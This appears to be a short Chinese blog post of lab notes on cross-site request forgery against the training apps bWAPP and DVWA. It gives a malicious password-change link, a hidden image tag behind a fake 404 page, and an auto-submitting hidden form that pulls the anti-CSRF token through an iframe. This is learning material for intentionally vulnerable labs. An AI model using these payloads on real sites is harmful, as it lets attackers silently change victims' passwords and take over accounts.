bwapp–csrf

正文:

浅谈csrf
手工利用csrf   and   csrf实例
利用工具:1.CSRFTester    链接    2.Deemon   链接   (两个都没有试过,收集在此)

bwapp本地实验:

参考dvwa的csrf本地实验
1.
受害者点击:
192.168.244.170/bWAPP/csrf_1.php?password_new=be&password_conf=be&action=change
让其点击即可
域名可生成相应短链接
2)
<img src=“192.168.244.170/bWAPP/csrf_1.php?password_new=be&password_conf=be&action=change” border=“0” style=“display:none;”/>
<h1>404<h1>
<h2>file not found.<h2>
当受害者访问test.html时,会误认为是自己点击的是一个失效的url,但实际上已经遭受了CSRF攻击,密码已经被修改为了hack
我测试时候套进img里就不行了,着实有点疑惑。
用dvwa的127.0.0.1测试没有问题,即本地测试没有问题,应该是地址的缘故。

dvwa实验:

2.
<script type=”text/javascript”>
function attack()
{
document.getElementsByName(‘user_token’)[0].value=document.getElementById(“hack”).contentWindow.document.getElementsByName(‘user_token’)[0].value;
document.getElementById(“transfer”).submit();
}
</script>
<iframe src=”http://127.0.0.1/DVWA/vulnerabilities/csrf” id=”hack” border=”0″ style=”display:none;”>
</iframe>
<body onload=”attack()”>
<form method=”GET” id=”transfer” action=”http://127.0.0.1/DVWA/vulnerabilities/csrf”>
<input type=”hidden” name=”password_new” value=”pass”>
<input type=”hidden” name=”password_conf” value=”pass”>
<input type=”hidden” name=”user_token” value=””>
<input type=”hidden” name=”Change” value=”Change”>
</form>
</body>
测试成功
2)作者讲到有个跨域问题,即利用xss辅助
 
2018.8.3

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注